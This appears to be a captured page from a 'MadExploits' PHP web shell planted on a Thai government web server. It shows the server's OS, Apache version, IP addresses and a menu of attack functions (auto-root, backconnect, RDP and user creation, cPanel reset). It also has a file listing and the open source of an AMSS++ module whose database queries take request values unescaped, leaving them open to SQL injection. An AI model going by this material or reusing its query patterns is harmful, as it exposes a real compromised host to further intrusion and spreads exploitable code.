Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
book /
main /
[ HOME SHELL ]
Name
Size
Permission
Action
book_delay.php
14.43
KB
-rw-r--r--
bookdetail.php
13.23
KB
-rwxr-xr-x
bookdetail_group.php
20.9
KB
-rwxr-xr-x
bookdetail_khet_person.php
16.14
KB
-rwxr-xr-x
bookdetail_khet_total.php
11.85
KB
-rwxr-xr-x
bookdetail_khet_total_2.php
11.87
KB
-rw-r--r--
bookdetail_saraban.php
18.39
KB
-rwxr-xr-x
bookdetail_school_person.php
13.71
KB
-rwxr-xr-x
bookdetail_school_saraban.php
20.33
KB
-rwxr-xr-x
bookdetail_school_total.php
10.3
KB
-rwxr-xr-x
bookdetail_school_total_2.php
10.69
KB
-rw-r--r--
booksenddetail.php
9.98
KB
-rwxr-xr-x
booksenddetail_2.php
10.38
KB
-rw-r--r--
group.php
5.46
KB
-rwxr-xr-x
group_member.php
4.19
KB
-rwxr-xr-x
group_member_report.php
2.68
KB
-rwxr-xr-x
livesearch.php
742
B
-rwxr-xr-x
livesearch_2.php
744
B
-rwxr-xr-x
livesearch_3.php
681
B
-rwxr-xr-x
move_book.php
6.11
KB
-rw-r--r--
person_chk.php
859
B
-rwxr-xr-x
receive.php
27.38
KB
-rw-r--r--
receive.php-OLD
26.39
KB
-rwxr-xr-x
receive.php==1
25.38
KB
-rwxr-xr-x
receive00.php
25.8
KB
-rwxr-xr-x
receive11.php
26.13
KB
-rwxr-xr-x
receive_mobile.php
23.72
KB
-rwxr-xr-x
report_1.php
13.08
KB
-rw-r--r--
report_2.php
13.21
KB
-rw-r--r--
select_send.php
9.07
KB
-rwxr-xr-x
select_send_2.php
8.78
KB
-rwxr-xr-x
send.php
41.59
KB
-rw-r--r--
send.php--1
35.79
KB
-rwxr-xr-x
send.php-OLD
40.13
KB
-rwxr-xr-x
send.php.save
38.56
KB
-rwxr-xr-x
send.php_bkkk
38.48
KB
-rwxr-xr-x
send_2.php
15.54
KB
-rwxr-xr-x
send_mobile.php
33.85
KB
-rwxr-xr-x
send_sch_2.php
11.96
KB
-rwxr-xr-x
sendto_show.php
2.31
KB
-rwxr-xr-x
z.php
248
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : select_send.php
<?php session_start(); if(!(isset($_SESSION['login_user_id']))){ exit(); } $ref_id= $_SESSION ['ref_id'] ; if(isset($_REQUEST['sd_index'])){ $sd_index=$_REQUEST['sd_index']; } if(!(isset($_SESSION['user_school']))){ $_SESSION['user_school']="";; } if(!(isset($_REQUEST['group']))){ $_REQUEST['group']=""; } date_default_timezone_set('Asia/Bangkok'); require_once "../../../amssplus_connect.php"; require_once("../../../mainfile.php"); ?> <html> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <head> <title>AMSS++</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="stylesheet" href="css/mm_training.css" type="text/css" /> <script> function showResult(str) { if (str.length==0) { document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; return; } if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari xmlhttp=new XMLHttpRequest(); } else { // code for IE6, IE5 xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.onreadystatechange=function() { if (this.readyState==4 && this.status==200) { document.getElementById("livesearch").innerHTML=this.responseText; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; } } xmlhttp.open("GET","livesearch.php?q="+str,true); xmlhttp.send(); } </script> </head> <body topmargin="0" leftmargin="0" > <div align="center"> <table border="0" width="100%" style="border-collapse: collapse"> <tr><td bgcolor="#800000"><font face="Tahoma"><font size="2"> </font><span lang="th"><font size="2" color="#FFFFFF"><B>กรุณาคลิกเลือกผู้รับ</B></font></span></font> </td></tr></table> <?php if($sd_index=='some'){ $result=mysqli_query($connect,"SELECT * FROM system_school_group") ; $num = mysqli_num_rows ($result) ; $list=1; echo "<FONT SIZE='3' color='#800080'><b>เลือกกลุ่มสถานศึกษา</b></font><br>"; echo "<FONT SIZE=2 COLOR=''><A HREF=\"?group=999&sd_index=$sd_index\"><span style=\"text-decoration: none\">"; if($_REQUEST['group']==999){ echo "<b><font color='#FF3300'>ทั้งหมด</font></b>"; } else{ echo "ทั้งหมด"; } echo "</span></A>||</FONT> " ; while ($r=mysqli_fetch_array($result)) { $group_code = $r['code'] ; $group_name = $r['name'] ; if ($list!=$num){$divition="||";}else{$divition="";} echo "<FONT SIZE=2 COLOR=''><A HREF=\"?group=$group_code&sd_index=$sd_index\"><span style=\"text-decoration: none\">"; if($_REQUEST['group']==$group_code){ echo "<b><font color='#FF3300'>$group_name</font></b>"; } else{ echo $group_name; } echo "</span></A> $divition </FONT> " ; $list ++ ; } // จบ while result } //จบ sd_index=some ?> <br /><br /> <form method="POST" action="select_send.php" name="form1" > <TABLE border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width=95% bordercolor="#808000" bgcolor="#FFFBEA"> <?php if(($sd_index>0) or ($_REQUEST['group']!="")){ ?> <TR > <td colspan=4> <input name="allbox" onClick="selectall();" type="checkbox"><FONT SIZE="2" COLOR="#990033">เลือก/ไม่เลือกสถานศึกษาทั้งหมด</FONT><HR></td> </tr> <?php } ?> <?php if(!($sd_index>=1)){ ?> <tr><td colspan='4'> <div align='left'> <font size='2'>ค้นหาสถานศึกษา <input type="text" size="15" onKeyUp="showResult(this.value)"> <div id="livesearch"></div> </font> </div> </td></tr> <tr> <?php } ?> <?php //กำหนดตัวแปร if(!(isset($_POST['index']))){ $_POST['index']=""; } //กรณีค้นหาสถานศึกษา if(isset($_GET['insert_index'])){ $_POST['index']=1; $_POST['s_id'][1]=$_GET['school_code']; $_POST['boxchecked']=1; } if($_POST['index']==1){ $s_id=$_POST['s_id']; for ($i=1;$i<=$_POST['boxchecked'];$i++){ if(isset($_POST['s_id'][$i])){ if ($_POST['s_id'][$i]!="") // Check Select Topic { if($_SESSION['login_status']<=5){ mysqli_query($connect,"INSERT INTO book_sendto_answer (send_level, send_to,ref_id) Values('1', '$s_id[$i]','$ref_id') ") ; } else if(($_SESSION['login_status']>10) and ($_SESSION['login_status']<=15)){ mysqli_query($connect,"INSERT INTO book_sendto_answer (send_level, send_to,ref_id) Values('3', '$s_id[$i]','$ref_id') ") ; } } } } } if(isset($_GET['index'])){ if($_GET['index']==2){ mysqli_query($connect,"DELETE FROM book_sendto_answer WHERE send_to='$_GET[sendtoname]' and ref_id='$ref_id' ") ; } } if(!(isset($_SESSION['user_school']))){ $_SESSION['user_school']=""; } if($sd_index=='some'){ if($_REQUEST['group']==999){ $result1=mysqli_query($connect,"SELECT * FROM system_school order by school_type, school_code") ; } else{ $result1=mysqli_query($connect,"SELECT * FROM system_school where school_group='$_REQUEST[group]' and school_code != '$_SESSION[user_school]' order by school_type, school_code") ; } } else{ $result1=mysqli_query($connect,"SELECT * FROM book_group_member left join system_school on book_group_member.school_id=system_school.school_code WHERE book_group_member.grp_id= '$sd_index' order by system_school.school_type, system_school.school_code") ; } $num1 = mysqli_num_rows ($result1) ; $list1=1; while ($r1=mysqli_fetch_array($result1)) { $school_code = $r1['school_code'] ; $school_name = $r1['school_name'] ; $result_select=mysqli_query($connect,"SELECT * FROM book_sendto_answer WHERE send_to='$school_code' and ref_id='$ref_id'") ; $num_select = mysqli_num_rows ($result_select) ; if ($num_select==0) { ?> <TD width="25%"> <input type="checkbox" name="s_id[<?php echo $list1?>]" value="<?php echo $school_code?>"><FONT SIZE="2" COLOR="#660099"><?php echo $school_code." ".$school_name?></FONT></TD> <?php } if($list1%3==0){ echo "</tr><tr>";} $list1 ++ ; } ?> </TR></table> <?php if(($sd_index>0) or ($_REQUEST['group']!="")){ ?> <BR><input name="boxchecked" type="hidden" id="boxchecked" value="<?php echo $list1?>"> <input name="sd_index" type="hidden" value="<?php echo $sd_index?>"><input name="index" type="hidden" value="1"><input name="group" type="hidden" value="<?php echo $_REQUEST['group']?>"> <input type="submit" value=" เลือก " name="submit" onClick="return checkform();"> </form> <?php } ?> <HR> <!--Userที่เลือกแล้ว --> <?php $result2=mysqli_query($connect,"SELECT * FROM book_sendto_answer left join system_school on book_sendto_answer.send_to=system_school.school_code WHERE book_sendto_answer.ref_id='$ref_id' order by book_sendto_answer.id") ; $num2 = mysqli_num_rows ($result2) ; ?> <table border="0" width="400" style="border-collapse: collapse" bgcolor="#EAFFF0"> <form method="POST" action="" name="form2" > <tr> <td> <b><font size="2" color="#800080">รายชื่อสถานศึกษาที่เลือกไว้ จำนวน <FONT SIZE="2" COLOR="#FF0066"><?php echo $num2 ?></FONT> แห่ง</font></b></td> </tr> <tr> <td> <?php $list2=1; while ($r2=mysqli_fetch_array($result2)) { $sendtoname = $r2['send_to'] ; $school_name = $r2['school_name'] ; ?> <FONT SIZE="2" COLOR=""><A HREF="select_send.php?sendtoname=<?php echo $sendtoname?>&index=2&sd_index=<?php echo $sd_index?>&group=<?php echo $_REQUEST['group']?>"><IMG SRC="../../../images/b_drop.png" WIDTH="16" HEIGHT="16" BORDER="0" ALT="ลบออก"></A> <?php echo $list2?>. <?php echo $school_name?></FONT><BR> <?php $list2 ++ ; } ?> </td> </tr> <tr> <td align="center"> <input type="submit" value=" เสร็จ " name="submit1" onClick="return checkform2();"> </td> </tr> </form> </table> </div> <HR> </body> <script language="JavaScript"> <!-- function selectall(){ for (var i=0;i<document.form1.elements.length;i++) { var e = document.form1.elements[i]; if (e.name != 'allbox') e.checked = document.form1.allbox.checked; } } function checkform() { var checkvar = document.all; var check = ""; for (i = 0; i < checkvar.length; i++) { if (checkvar[i].checked){ check = "Y"; break; } } if (check==""){ alert("กรุณาเลือกอย่างน้อย 1 รายการค่ะ"); return false; }else{ return confirm ("คุณต้องการส่งหนังสือตามรายชื่อที่ได้เลือกไว้ ?"); return true; } } function checkform2() { var num_item=<?php echo $num2?>; if (num_item==0){ alert("กรุณาเลือกอย่างน้อย 1 รายการค่ะ"); return false; }else{ window.close() } } </script> </html>
Close
